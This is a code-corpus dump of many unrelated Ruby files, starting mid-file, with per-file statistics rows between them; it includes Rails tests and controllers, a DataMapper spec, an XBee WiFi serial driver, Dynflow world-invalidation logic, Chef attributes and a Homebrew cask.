    DATAITEM_EXROUTE_MONITORING => CONTRACT_EXROUTE_MONITOR_DATA_KEYS,
    DATAITEM_CONNECTIONMONITOR_TEST => CONTRACT_CONNECTIONMONITOR_TEST_RESULT_KEYS,
    DATAITEM_CONNECTIONMONITOR_PATH => CONTRACT_CONNECTIONMONITOR_PATH_DATA_KEYS,
    DATAITEM_AGENT_DIAGNOSTICS => CONTRACT_AGENT_DIAGNOSTICS_KEYS,
  }.freeze

  # Validates +item+ (a hash) against the contract for +itemType+.
  # Returns [code, offending_key_or_nil]; see module comment for codes.
  def self.IsValidDataitem(item, itemType)
    _contract = CONTRACT_FOR_TYPE[itemType]
    return DATAITEM_ERR_INVALID_TYPE, nil if _contract.nil?
    item.keys.each do |k|
      return DATAITEM_ERR_INVALID_FIELDS, k if !_contract.include?(k)
    end
    return DATAITEM_VALID, nil
  end
end
| 47.270609 | 213 | 0.44317 |
2623a9dafb063ce5a6329e223cc4979f615d95c4 | 1,204 | ENV["RAILS_ENV"] = "test"
require File.expand_path('../../config/environment', __FILE__)
require 'rails/test_help'

# Test-suite base class for the ComfyGallery engine's dummy Rails app.
class ActiveSupport::TestCase
  fixtures 'gallery/galleries', 'gallery/photos'

  include ActionDispatch::TestProcess

  # Every test starts from the gem's default configuration.
  def setup
    reset_config
  end

  # resetting default configuration
  def reset_config
    ComfyGallery.configure do |config|
      config.upload_options   = { }
      config.admin_controller = 'ApplicationController'
      config.form_builder     = 'ComfyGallery::FormBuilder'
    end
  end

  # Example usage:
  #   assert_has_errors_on( @record, [:field_1, :field_2] )
  #   assert_has_errors_on( @record, {:field_1 => 'Message1', :field_2 => 'Message 2'} )
  # Accepts a single field, an array of fields, or a hash of field => message;
  # when messages are given they are checked against the record's errors.
  def assert_has_errors_on(record, fields)
    fields = [fields].flatten unless fields.is_a?(Hash)
    fields.each do |field, message|
      assert record.errors.to_hash.has_key?(field.to_sym), "#{record.class.name} should error on invalid #{field}"
      # Error collections may be arrays; search them for the expected message.
      if message && record.errors[field].is_a?(Array) && !message.is_a?(Array)
        assert_not_nil record.errors[field].index(message)
      elsif message
        assert_equal message, record.errors[field]
      end
    end
  end
end
| 30.871795 | 114 | 0.687708 |
f8c32c193b80d57c89676382fc62fc5945b40288 | 1,898 | require 'spec_helper'
describe "1:1 (PK subset FK)" do
  before(:all) do
    # Parent model: composite key (id, audit_id) with a destroy-constrained
    # 1:1 child membership.
    class ::Person
      include DataMapper::Resource
      extend ConstraintSupport

      property :id,       Serial,  :key => true
      property :audit_id, Integer, :key => true, :min => 0
      property :name,     String,  :required => true

      has 1, :membership, constraint(:destroy)
    end

    class ::Membership
      include DataMapper::Resource

      # keep properties unordered
      property :person_audit_id, Integer, :key => false, :min => 0, :unique => :person
      property :person_id,       Integer, :key => true,  :min => 0, :unique => :person
      property :role,            String,  :required => true

      belongs_to :person
    end

    DataMapper.auto_migrate!
  end

  before(:each) do
    # Start every example from an empty database.
    Membership.all.destroy!
    Person.all.destroy!
  end

  describe "Person.accepts_nested_attributes_for(:membership)" do
    before(:all) do
      Person.accepts_nested_attributes_for :membership
    end

    it "should allow to update an existing membership via Person#membership_attributes" do
      person1 = Person.create(:id => 1, :audit_id => 10, :name => 'Martin')
      Membership.create(:person => person1, :role => 'maintainer')
      person1.reload

      person2 = Person.create(:id => 2, :audit_id => 20, :name => 'John')
      Membership.create(:person => person2, :role => 'contributor')
      person2.reload

      Person.all.size.should     == 2
      Membership.all.size.should == 2

      # Nested attributes must update only person1's membership.
      person1.membership_attributes = { :role => 'tester' }
      person1.save.should be_true

      Person.all.map { |p| [p.id, p.audit_id, p.name] }.should == [
        [1, 10, 'Martin'],
        [2, 20, 'John'],
      ]

      Membership.all.map { |m| [m.person_id, m.person_audit_id, m.role] }.should == [
        [1, 10, 'tester'],
        [2, 20, 'contributor'],
      ]
    end
  end
end
| 28.757576 | 90 | 0.603793 |
ac94c67fa5e27372b58a56910ab0ea01948f9277 | 620 | module SpreeUserProfile
module Generators
  # Installer for the spree_user_profile extension: copies the engine's
  # migrations into the host application and optionally runs them.
  class InstallGenerator < Rails::Generators::Base
    class_option :migrate, type: :boolean, default: true

    # Copy the engine's migrations into the host application.
    def add_migrations
      run 'bundle exec rake railties:install:migrations FROM=spree_user_profile'
    end

    # Run the copied migrations unless the user opted out. When --migrate
    # was not forced, ask interactively (an empty answer counts as "yes").
    def run_migrations
      confirmed = options[:migrate] || ['', 'y', 'Y'].include?(ask('Would you like to run the migrations now? [Y/n]'))
      unless confirmed
        puts 'Skipping rails db:migrate, don\'t forget to run it!'
        return
      end
      run 'bundle exec rails db:migrate'
    end
  end
end
end
| 29.52381 | 125 | 0.645161 |
7974bd4e86b259c27352e810316524e5b73e8ee1 | 2,044 | require 'rubygems/test_case'
require "rubygems/text"
# Unit tests for the Gem::Text mixin: word wrapping (format_text) and
# edit-distance (levenshtein_distance).
# NOTE(review): the expected strings below are whitespace-sensitive; their
# leading spaces may have been mangled in transit — verify against the
# rubygems upstream source.
class TestGemText < Gem::TestCase
  include Gem::Text

  def test_format_text
    assert_equal "text to\nwrap", format_text("text to wrap", 8)
  end

  def test_format_text_indent
    assert_equal " text to\n wrap", format_text("text to wrap", 8, 2)
  end

  def test_format_text_none
    assert_equal "text to wrap", format_text("text to wrap", 40)
  end

  def test_format_text_none_indent
    assert_equal " text to wrap", format_text("text to wrap", 40, 2)
  end

  def test_format_text_trailing # for two spaces after .
    text = <<-TEXT
This line is really, really long. So long, in fact, that it is more than eighty characters long! The purpose of this line is for testing wrapping behavior because sometimes people don't wrap their text to eighty characters. Without the wrapping, the text might not look good in the RSS feed.
    TEXT

    expected = <<-EXPECTED
This line is really, really long. So long, in fact, that it is more than
eighty characters long! The purpose of this line is for testing wrapping
behavior because sometimes people don't wrap their text to eighty characters.
Without the wrapping, the text might not look good in the RSS feed.
    EXPECTED

    assert_equal expected, format_text(text, 78)
  end

  # Distance is symmetric for insertions/deletions.
  def test_levenshtein_distance_add
    assert_equal 2, levenshtein_distance("zentest", "zntst")
    assert_equal 2, levenshtein_distance("zntst", "zentest")
  end

  # Distance against the empty string equals the other string's length.
  def test_levenshtein_distance_empty
    assert_equal 5, levenshtein_distance("abcde", "")
    assert_equal 5, levenshtein_distance("", "abcde")
  end

  def test_levenshtein_distance_remove
    assert_equal 3, levenshtein_distance("zentest", "zentestxxx")
    assert_equal 3, levenshtein_distance("zentestxxx", "zentest")
  end

  # Substitutions are case-sensitive.
  def test_levenshtein_distance_replace
    assert_equal 2, levenshtein_distance("zentest", "ZenTest")
    assert_equal 7, levenshtein_distance("xxxxxxx", "ZenTest")
    assert_equal 7, levenshtein_distance("zentest", "xxxxxxx")
  end
end
| 34.644068 | 294 | 0.744618 |
5debc08d18aaa4222f5d9ac81c1962b763b60b50 | 134 | class AddMultipleToProject < ActiveRecord::Migration
def change
add_column :projects, :multiple, :decimal, default: 1
end
end
| 22.333333 | 57 | 0.761194 |
2847e6f26608ef9f39ae62af24ec75d9327f22f4 | 4,373 | #
#
# PlatoDevice::XBeeWifi class
#
module PlatoDevice
  # Driver for a Digi XBee Wi-Fi module attached over a serial line.
  # Implements the module's "+++"/AT command protocol: enter command mode,
  # issue ATxx commands, and read CR-terminated responses.
  class XBeeWiFi < Plato::WiFi
    include Plato
    CR = "\r"
    TMO_RESPONSE = 2000   # default AT-response timeout [ms]
    @@wifi = nil          # shared driver instance (see .open)
    @@resolv = {}         # DNS cache: fqdn => ip-address string

    def initialize
      super
      # 9600 baud, 8 data bits, 1 stop bit, no parity.
      @wifi = Plato::Serial.open(9600, 8, 1, 1, :none)
    end

    # Returns the shared driver instance, creating it on first use.
    def self.open
      @@wifi = self.new unless @@wifi
      @@wifi
    end

    # Enters the interactive configuration menu when the given switch is
    # pressed within one second of startup. Returns self for chaining.
    def config(sw=nil)
      if sw
        bt = Plato::ButtonSwitch.new(sw)
        tmo = Machine.millis + 1000
        while tmo > Machine.millis
          if bt.on?
            XBeeWiFiConfig.new(self).menu
            break
          end
          Machine.delay(1)
        end
      end
      self
    end

    # Runs one AT command (or an array of them) within a single command-mode
    # session. Returns a single response String for one command, or an Array
    # of responses for several. Errors during the session are swallowed.
    def atcmd(cmds, tmo=2000)
      cmds = [cmds] unless cmds.instance_of?(Array)
      rsp = []
      begin
        enter_at_mode
        cmds.each {|c|
          rsp << cmd(c, tmo)
        }
        cmd "ATCN"   # leave command mode
        # rsp = rsp[0] if rsp.size == 1
      rescue
      end
      return rsp.size <= 1 ? rsp[0] : rsp
    end

    # Sends a single command line and returns its CR-terminated response.
    def cmd(c, tmo=2000)
      self.write "#{c}#{CR}"
      wait_cr tmo
    end

    # Thin delegation to the underlying serial port.
    def _write(c); @wifi._write(c); end
    def _read; @wifi._read; end
    def available; @wifi.available; end
    def flush; @wifi.flush; end

    # Clears the destination address/port. The serial port itself stays
    # open (see the commented-out lines below).
    def close
      if @wifi
        atcmd ["ATDL0.0.0.0", "ATDE0"]
        # @wifi.close # disable enzi debug message
        # @wifi = nil
      end
    end

    # Wait for CR reception, copy from zigbee
    # Accumulates characters until CR and returns them (without the CR);
    # raises on timeout (tmo in ms; nil waits forever).
    def wait_cr(tmo=nil)
      tmo += Machine.millis if tmo
      s = ""
      while true
        c = @wifi.getc
        return s if c == CR
        if c
          s << c
        else
          raise "XBee-wifi response timeout #{s}" if tmo && tmo <= Machine.millis
          Machine.delay(1)
        end
      end
    end

    # Enter AT command mode
    # Sends the '+++' escape (with the required 1 s guard time) up to 10
    # times and returns the module's response.
    # NOTE(review): `gets` here presumably resolves to the serial-port
    # reader inherited from Plato::WiFi, not Kernel#gets — confirm.
    def enter_at_mode
      while gets.size > 0; end # discard remain data
      Machine.delay(1000) # wait 1 second
      10.times do
        begin
          self.write '+++'
          Machine.delay(1000) # wait 1 second
          rsp = wait_cr(TMO_RESPONSE)
          return rsp
        rescue => e
        end
      end
      raise "Cannot enter AT mode"
    end

    # get XBee WiFi status (association indicator)
    # Returns the ATAI code as an Integer (response is hex).
    def status
      sts = atcmd "ATAI"
      sts.to_i(16)
    end

    # wait for connection to AP
    # Polls the association indicator up to trycnt times; raises with a
    # specific message for known failure codes.
    def wait_connect(trycnt=10)
      trycnt.times do
        case sts = status
        when 0x00; return
        when 0x23; raise "SSID not configured"
        when 0x24; raise "Encryption key invalid"
        when 0x27; raise "SSID was found, but join failed"
        # else; Object.puts "status = 0x#{sts.to_s(16)}"
        end
      end
      raise "Cannot connect to target"
    end

    # connect to destination
    # Sets the destination address (ATDL) and port (ATDE, hex) and waits
    # for the association indicator to report success.
    def connect(dest, port=80)
      @dest = dest
      @port = port
      atcmd ["ATDL#{@dest}", "ATDE#{@port.to_s(16)}"]
      wait_connect
    end

    # get ip address
    def ip_address
      atcmd "ATMY"
    end

    # get mac address
    # Zero-pads the high word to 4 and the low word to 8 hex digits.
    def mac_address
      rsp = atcmd ["ATSH", "ATSL"]
      return ('0' * 3 + rsp[0])[-4, 4] + ('0' * 7 + rsp[1])[-8, 8]
    end

    # ping command
    def ping(ip)
      atcmd "ATPG#{ip}", 5000
    end

    # DNS Lookup
    # Resolves fqdn via the module (ATLA), caching results in @@resolv.
    # Raises when the module reports an error or a malformed address.
    def dns_lookup(fqdn)
      rsp = @@resolv[fqdn]
      # Object.puts "#{fqdn}: #{rsp}" if rsp
      return rsp if rsp
      addr = atcmd "ATLA#{fqdn}", 15000
      if addr == 'ERROR' || !IPSocket.valid_address?(addr)
        raise "#{fqdn} not provided"
      end
      # Object.puts "#{fqdn}: #{addr}"
      @@resolv[fqdn] = addr
    end

    # reset network
    def reset
      atcmd "ATNR", 3000
    end

    # scan for access points
    # Returns an array of [ssid, security_type] pairs, where security_type
    # is :none, :wpa, :wpa2, :wep, or nil for unknown codes.
    def scan_ap
      enter_at_mode
      self.write "ATAS#{CR}"
      ap = []
      loop {
        sc = wait_cr 3000 # scan type
        break if !sc || sc.size == 0 || sc == 'ERROR'
        ch = wait_cr # channel number
        st = wait_cr # security type ('00':open, '01':WPA, '02':WPA2, '03':WEP)
        lm = wait_cr # Link margin
        id = wait_cr # SSID
        sec_type = case st
          when '00'; :none
          when '01'; :wpa
          when '02'; :wpa2
          when '03'; :wep
          else; nil
        end
        ap << [id, sec_type] # ssid, sec_type
      }
      cmd "ATCN"
      return ap
    end

    # set resolver
    # Pre-seeds the DNS cache so dns_lookup can answer without the radio.
    def self.setaddress(fqdn, addr)
      @@resolv[fqdn] = addr
    end
  end
end
| 22.425641 | 84 | 0.515436 |
6a198f07333dab3ec0e22175c9adf3963c82e016 | 770 | default['chef']['user'] = 'chef'
# Local chef-solo service account and checkout locations.
default['chef']['group'] = 'chef'
default['chef']['home']  = '/home/chef'
default['chef']['root']  = '/var/chef-solo'
default['chef']['shell'] = '/bin/bash'
default['chef']['repo']  = "#{node['chef']['home']}/repo"

# update every 2 hours.
# (cron fields: minute 0 of every odd hour, every day)
default['update']['minute']  = '0'
default['update']['hour']    = '1,3,5,7,9,11,13,15,17,19,21,23'
default['update']['day']     = '*'
default['update']['weekday'] = '*'

# reboot every night.
default['reboot']['time'] = '5:30'

# git checkout information.
default['git']['branch']   = 'master'
default['git']['repo']     = 'https://github.com/uccs-se/chef-repo'
default['git']['revision'] = 'HEAD'
default['git']['depth']    = 1
# Retry failed fetches 3 times with a 300-second delay.
default['git']['retries']  = 3
default['git']['delay']    = 300
| 30.8 | 67 | 0.580519 |
e89987df7674ed53abae7294b76ca25192019ea7 | 812 | module JekyllPatternbot
class LayoutsFinder

  # Template for a single layout entry. Returns a fresh hash on every call
  # so callers can mutate the result safely.
  def base
    {
      :name        => false,
      :description => false,
    }
  end

  # Scans the configured layouts directory and returns one info hash per
  # layout file: :name is the basename without extension, :description is
  # taken from `patternbot.layouts` in the site config when present.
  # Returns [] when the layouts directory does not exist.
  def info
    layouts_dir = File.expand_path Config['layouts_dir']
    return [] unless File.directory? layouts_dir

    # Hash lookup replaces the original per-layout scan over every
    # configured description (and `for` loop, which leaks its variable).
    descriptions = Config['patternbot']['layouts'] || {}
    FileHelper.list_files_with_ext(layouts_dir, '*').map do |layout|
      layout_data = base
      layout_data[:name] = File.basename layout, '.*'
      desc = descriptions[layout_data[:name]]
      layout_data[:description] = desc.strip if desc
      layout_data
    end
  end

end
end
| 24.606061 | 68 | 0.58867 |
21bed3f89f68ab96d49f547752d84a8278d1cec6 | 4,748 | # -*- coding: utf-8 -*-
class HomeController < ApplicationController
  require 'timeout'

  # Codes selecting which template #send_mail delivers.
  MAIL_TYPES = {
    :registration => 0,
    :confirmation => 1,
    :failure => 2,
    :response_pending => 3
  }

  # Search form: loads the lookup collections and a blank Request.
  def index
    flash[:error] = nil
    flash[:notice] = nil
    if user_signed_in?
      @user = User.find(current_user.id)
    end
    @request = Request.new
    @regions = Region.all
    @room_types = RoomType.all
    @room_porperties = RoomProperty.all
  end

  # Creates a search request: normalizes form params, creates or updates
  # the submitting user (registering unknown guests with a generated
  # password), saves the request with its room properties, then matches
  # sites in the requested region/room type and mails each matching site
  # plus a confirmation to the user.
  def create
    flash[:error] = nil
    flash[:notice] = nil
    # Dates arrive as dd/mm/yyyy strings; blank prices default to 0.
    params[:request][:start_date] = DateTime.strptime(params[:request][:start_date], "%d/%m/%Y").to_time()
    params[:request][:end_date] = DateTime.strptime(params[:request][:end_date], "%d/%m/%Y").to_time()
    if params[:request][:price_from].empty?
      params[:request][:price_from] = 0
    end
    if params[:request][:price_to].empty?
      params[:request][:price_to] = 0
    end
    @regions = Region.all
    @room_types = RoomType.all
    @room_porperties = RoomProperty.all
    @request = Request.new(params[:request])
    if !user_signed_in?
      # Guest flow: look the user up by email; register them if unknown.
      @user = User.find(:all, :conditions => {:email => params[:user][:email]}).first
      if !@user
        # password_length = 6
        # password = Devise.friendly_token.first(password_length)
        password = generate_activation_code()
        params[:user][:password] = password
        params[:user][:password_confirmation] = password
        @user = User.new(params[:user])
        if @user.save
          # send_mail @user, MAIL_TYPES[:registration]
        else
          # send_mail @user, MAIL_TYPES[:failure]
        end
      else
        # Known guest: refresh their contact details.
        @user.first_name = params[:user][:first_name]
        @user.last_name = params[:user][:last_name]
        @user.phone = params[:user][:phone]
        if @user.save
          # send_mail @user, MAIL_TYPES[:confirmation], @request
        else
          # send_mail @user, MAIL_TYPES[:failure]
        end
      end
      @request.user = @user
    else
      @user = User.find(current_user.id)
      @user.update_attributes(params[:user])
    end
    @request.status = 1 #1 = pending TODO: add constants for status
    if @request.save
      #@request.room_porperties_id = @request.id #this line is not needed, tables are based on has_and_belongs_to_many
      request_room_porperty_list = params[:room_porperty_request][:list]
      request_room_porperty_list.each do |prop_id|
        if prop_id != ""
          @request.room_properties << RoomProperty.find(prop_id.to_i)
        end
      end
      if @request.save
        @sites_counter = 0
        matched_sites = Site.where(:region_id => params[:request][:region_id], :room_type_id => params[:request][:room_type_id])
        matched_sites.each do |site|
          # A site matches only when it offers every requested room property.
          site.room_properties = []
          site.site_properties.each do |site_prop|
            site.room_properties << RoomProperty.find(site_prop.room_property_id)
          end
          if is_array_included(@request.room_properties, site.room_properties)
            @sites_counter += 1
            @request.responses << Response.new( :site_id => site.id)
            send_mail @user, MAIL_TYPES[:response_pending], @request, site
          end
        end
        if @sites_counter > 0
          # NOTE(review): `password` is nil here when the user was signed in
          # or already registered — confirm the mailer tolerates that.
          send_mail @user, MAIL_TYPES[:confirmation], @request, nil, password
          render 'request_confirmation'
        else
          flash[:error] = "ืื ื ืืฆืื ืฆืืืจืื ืืขืื ืื ืืืจืืฉืชื! ืื ื ืฉื ื ืืช ืืืคืืื ื ืืืืคืืฉ ืฉืื ืื ืกื ืฉืื."
          render :index
        end
      else
        #TODO: add error which indicates that room properties doesn't saved! --> return render :text => "save failed!!! errors: #{@request.errors.inspect}"
        render :index
      end
    else
      #TODO: add error which indicates that request doesn't saved! --> return render :text => "save failed!!! errors: #{@request.errors.inspect}"
      render :index
    end
  end

  private

  # True when every element of arr_1 also appears in arr_2.
  def is_array_included arr_1, arr_2
    (arr_1 - arr_2).size == 0
  end

  # Delivers the mail matching +type+. The commented-out Timeout/rescue
  # wrapper suggests delivery was once best-effort with a 4 s budget.
  def send_mail user, type, request = nil, site = nil, password = nil
    #begin
    #status = Timeout::timeout(4) {
    case type
    when MAIL_TYPES[:registration]
      UserMailer.registration_confirmation(user).deliver
    when MAIL_TYPES[:confirmation]
      UserMailer.request_confirmation(user, request, password).deliver
    when MAIL_TYPES[:failure]
      UserMailer.failure(user).deliver
    when MAIL_TYPES[:response_pending]
      UserMailer.response_pending(request, site).deliver
    else
    end
    #}
    #rescue
    #end
  end

  # Random human-friendly code; ambiguous characters (0/O, 1/I/L, 5/S, 8/B)
  # are excluded from the charset.
  def generate_activation_code(size = 6)
    charset = %w{ 2 3 4 6 7 9 A C D E F G H J K M N P Q R T V W X Y Z}
    (0...size).map{ charset.to_a[rand(charset.size)] }.join
  end
end
| 32.081081 | 152 | 0.628054 |
187eb9bb1681fefd6584fcb2009723bdd636dc6a | 421 | require 'spec_helper'
describe SlackGamebot::Commands::Default do
  let!(:team) { Team.first || Fabricate(:team) }
  let(:app) { SlackGamebot::Server.new(team: team) }

  # Mentioning the bot by its configured user name replies with the banner.
  it 'default' do
    expect(message: SlackRubyBot.config.user).to respond_with_slack_message(SlackGamebot::ASCII)
  end

  # Matching the bot name is case-insensitive.
  it 'upcase' do
    expect(message: SlackRubyBot.config.user.upcase).to respond_with_slack_message(SlackGamebot::ASCII)
  end
end
| 32.384615 | 103 | 0.748219 |
5d8b8904502bc80780570ceeaa7c1e933c5c3693 | 424 | # frozen_string_literal: true
# Background job run for a newly created merge request: records the
# open-MR event, sends new-merge-request notifications, and creates
# cross-references from the merge request.
class NewMergeRequestWorker
  include ApplicationWorker
  include NewIssuable

  def perform(merge_request_id, user_id)
    if objects_found?(merge_request_id, user_id)
      EventCreateService.new.open_mr(issuable, user)
      NotificationService.new.new_merge_request(issuable, user)
      issuable.create_cross_references!(user)
    end
  end

  # Model class NewIssuable#objects_found? uses to look the record up.
  def issuable_class
    MergeRequest
  end
end
| 22.315789 | 61 | 0.79717 |
03a47cb050ac5b5fd6a872bc50145e3793c46935 | 6,793 | module Dynflow
class World
  # Recovery logic for worlds (executor/client processes) that died while
  # holding coordinator locks: releases their locks, fails their in-flight
  # steps, and resumes or re-dispatches their execution plans.
  module Invalidation
    # Invalidate another world, that left some data in the runtime,
    # but it's not really running
    #
    # @param world [Coordinator::ClientWorld, Coordinator::ExecutorWorld] coordinator record
    #   left behind by the world we're trying to invalidate
    # @return [void]
    def invalidate(world)
      Type! world, Coordinator::ClientWorld, Coordinator::ExecutorWorld
      coordinator.acquire(Coordinator::WorldInvalidationLock.new(self, world)) do
        # Planning locks first, then (for executors) execution locks.
        coordinator.find_locks(class: Coordinator::PlanningLock.name,
                               owner_id: 'world:' + world.id).each do |lock|
          invalidate_planning_lock lock
        end
        if world.is_a? Coordinator::ExecutorWorld
          old_execution_locks = coordinator.find_locks(class: Coordinator::ExecutionLock.name,
                                                       owner_id: "world:#{world.id}")

          # Deactivate before invalidating the locks so the dead executor
          # is not considered for re-dispatch.
          coordinator.deactivate_world(world)

          old_execution_locks.each do |execution_lock|
            invalidate_execution_lock(execution_lock)
          end
        end
        coordinator.delete_world(world)
      end
    end

    # Releases a planning lock left by a dead world: fails its running
    # steps, settles the plan state, and executes the plan when planning
    # had completed.
    def invalidate_planning_lock(planning_lock)
      with_valid_execution_plan_for_lock(planning_lock) do |plan|
        plan.steps.values.each { |step| invalidate_step step }

        state = plan.plan_steps.all? { |step| step.state == :success } ? :planned : :stopped
        plan.update_state(state)

        coordinator.release(planning_lock)
        execute(plan.id) if plan.state == :planned
      end
    end

    # Invalidate an execution lock, left behind by a executor that
    # was executing an execution plan when it was terminated.
    #
    # @param execution_lock [Coordinator::ExecutionLock] the lock to invalidate
    # @return [void]
    def invalidate_execution_lock(execution_lock)
      with_valid_execution_plan_for_lock(execution_lock) do |plan|
        plan.steps.values.each { |step| invalidate_step step }

        plan.execution_history.add('terminate execution', execution_lock.world_id)
        plan.update_state(:paused, history_notice: false) if plan.state == :running
        plan.save

        coordinator.release(execution_lock)

        if plan.error?
          new_state = plan.prepare_for_rescue
          execute(plan.id) if new_state == :running
        else
          if coordinator.find_worlds(true).any? # Check if there are any executors
            # Hand the plan back to the original client's pending request.
            client_dispatcher.tell([:dispatch_request,
                                    Dispatcher::Execution[execution_lock.execution_plan_id],
                                    execution_lock.client_world_id,
                                    execution_lock.request_id])
          end
        end
      end
    rescue Errors::PersistenceError
      logger.error "failed to write data while invalidating execution lock #{execution_lock}"
    end

    # Tries to load an execution plan using id stored in the
    # lock. If the execution plan cannot be loaded or is invalid,
    # the lock is released. If the plan gets loaded successfully, it
    # is yielded to a given block.
    #
    # @param execution_lock [Coordinator::ExecutionLock] the lock for which we're trying
    #   to load the execution plan
    # @yieldparam [ExecutionPlan] execution_plan the successfully loaded execution plan
    # @return [void]
    def with_valid_execution_plan_for_lock(execution_lock)
      begin
        plan = persistence.load_execution_plan(execution_lock.execution_plan_id)
      rescue => e
        if e.is_a?(KeyError)
          logger.error "invalidated execution plan #{execution_lock.execution_plan_id} missing, skipping"
        else
          logger.error e
          logger.error "unexpected error when invalidating execution plan #{execution_lock.execution_plan_id}, skipping"
        end
        coordinator.release(execution_lock)
        coordinator.release_by_owner(execution_lock.id)
        return
      end
      unless plan.valid?
        logger.error "invalid plan #{plan.id}, skipping"
        coordinator.release(execution_lock)
        coordinator.release_by_owner(execution_lock.id)
        return
      end
      yield plan
    end

    # Performs world validity checks
    #
    # @return [Integer] number of invalidated worlds
    def perform_validity_checks
      world_invalidation_result = worlds_validity_check
      locks_validity_check
      world_invalidation_result.values.select { |result| result == :invalidated }.size
    end

    # Checks if all worlds are valid and optionally invalidates them
    #
    # @param auto_invalidate [Boolean] whether automatic invalidation should be performed
    # @param worlds_filter [Hash] hash of filters to select only matching worlds
    # @return [Hash{String=>Symbol}] hash containg validation results, mapping world id to a result
    def worlds_validity_check(auto_invalidate = true, worlds_filter = {})
      worlds = coordinator.find_worlds(false, worlds_filter)

      # Ping all worlds in parallel, then wait for every check to settle.
      world_checks = worlds.reduce({}) do |hash, world|
        hash.update(world => ping_without_cache(world.id, self.validity_check_timeout))
      end
      world_checks.values.each(&:wait)

      results = {}
      world_checks.each do |world, check|
        if check.fulfilled?
          result = :valid
        else
          if auto_invalidate
            begin
              invalidate(world)
              result = :invalidated
            rescue => e
              logger.error e
              # Surface the failure reason in place of a status symbol.
              result = e.message
            end
          else
            result = :invalid
          end
        end
        results[world.id] = result
      end

      unless results.values.all? { |result| result == :valid }
        logger.error "invalid worlds found #{results.inspect}"
      end

      return results
    end

    # Cleans up locks which don't have a resource
    #
    # @return [Array<Coordinator::Lock>] the removed locks
    def locks_validity_check
      orphaned_locks = coordinator.clean_orphaned_locks

      unless orphaned_locks.empty?
        logger.error "invalid coordinator locks found and invalidated: #{orphaned_locks.inspect}"
      end

      return orphaned_locks
    end

    private

    # Marks a step that was :running when its world died as failed with an
    # "abnormal termination" error; other states are left untouched.
    def invalidate_step(step)
      if step.state == :running
        step.error = ExecutionPlan::Steps::Error.new("Abnormal termination (previous state: #{step.state})")
        step.state = :error
        step.save
      end
    end
  end
end
end
| 37.738889 | 122 | 0.626086 |
bb9cd4e685804da3c3e1f3839b5e86078b54223a | 1,310 | =begin
#DocuSign REST API
#The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for SwaggerClient::EnvelopeDocumentsResult
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
# Generated spec skeleton: verifies the model can be instantiated; the
# per-attribute examples are placeholders awaiting real assertions.
describe 'EnvelopeDocumentsResult' do
  before do
    # run before each test
    @instance = SwaggerClient::EnvelopeDocumentsResult.new
  end

  after do
    # run after each test
  end

  describe 'test an instance of EnvelopeDocumentsResult' do
    it 'should create an instact of EnvelopeDocumentsResult' do
      expect(@instance).to be_instance_of(SwaggerClient::EnvelopeDocumentsResult)
    end
  end

  describe 'test attribute "envelope_documents"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "envelope_id"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end
end
| 27.291667 | 123 | 0.755725 |
edc64dfdd2e64d565b8a3c35f77e49190898e809 | 342 | cask 'front' do
  # Pinned release; sha256 guards the exact build downloaded from the url.
  version '3.21.7'
  sha256 '9089e1faf406e94bc7da27579b994d12681e9ed2ffd937c631282c7f22d72917'

  url "https://dl.frontapp.com/desktop/builds/#{version}/Front-#{version}.zip"
  # appcast lets `brew cask` detect when a newer version is published.
  appcast 'https://dl.frontapp.com/desktop/updates/latest/mac/latest-mac.yml'
  name 'Front'
  homepage 'https://frontapp.com/'

  app 'Front.app'
end
| 28.5 | 78 | 0.745614 |
bf5c01d0db5b2fe0a532c646c68f93a86f60614b | 2,605 | # encoding: utf-8
module Epuber
class Compiler
class CompilationContext
# @return [Epuber::Book]
#
attr_reader :book
# @return [Epuber::Book::Target]
#
attr_reader :target
# @return [Epuber::Compiler::FileResolver]
#
attr_accessor :file_resolver
# This will track source files regardless of current target
#
# @return [Epuber::Compiler::FileDatabase]
#
attr_reader :source_file_database
# This will track source files depend on current target
#
# @return [Epuber::Compiler::FileDatabase]
#
attr_reader :target_file_database
# @return [Array<Epuber::Plugin>]
#
def plugins
@plugins ||= @target.plugins.map do |path|
begin
plugin = Plugin.new(path)
plugin.files.each do |file|
file_resolver.add_file(file)
end
plugin
rescue LoadError
UI.error "Can't find plugin at path #{path}"
end
end.compact
end
# @param [Class] klass class of thing you want to perform (Checker or Transformer)
# @param [Symbol] source_type source type of that thing (Checker or Transformer)
#
# @yield
# @yieldparam [Epuber::CheckerTransformerBase] instance of checker or transformer
#
# @return nil
#
def perform_plugin_things(klass, source_type)
plugins.each do |plugin|
plugin.instances(klass).each do |instance|
# @type [Epuber::CheckerTransformerBase] instance
next if instance.source_type != source_type
next if instance.options.include?(:run_only_before_release) && !release_build
yield instance
end
end
end
#########
# @return [Bool]
#
attr_accessor :should_check
# @return [Bool]
#
attr_accessor :should_write
# @return [Bool]
#
attr_accessor :release_build
# @return [Bool]
#
attr_accessor :use_cache
# @return [Bool]
#
attr_accessor :verbose
def verbose?
verbose
end
def debug?
!release_build
end
def incremental_build?
use_cache
end
def initialize(book, target)
@book = book
@target = target
@source_file_database = FileDatabase.new(Config.instance.file_stat_database_path)
@target_file_database = FileDatabase.new(Config.instance.target_file_stat_database_path(target))
end
end
end
end
| 23.053097 | 104 | 0.587332 |
f7d3ac8e222f517af7e067ccbe79660d4ecaeb5e | 591 | module TastesBitter
# Preview all emails at http://localhost:3000/rails/mailers/tastes_bitter_mailer
class TastesBitterMailerPreview < ActionMailer::Preview
def error_message
error_info = {
message: "A message",
file_or_page: "A file or page",
line_number: "A line number",
user_agent: "A user agent",
current_page: "A page",
platform: "A platform",
browser_name: "A browser",
browser_version: "A browser version"
}
::TastesBitter::JavascriptMailer.javascript_error(error_info)
end
end
end
| 24.625 | 82 | 0.654822 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.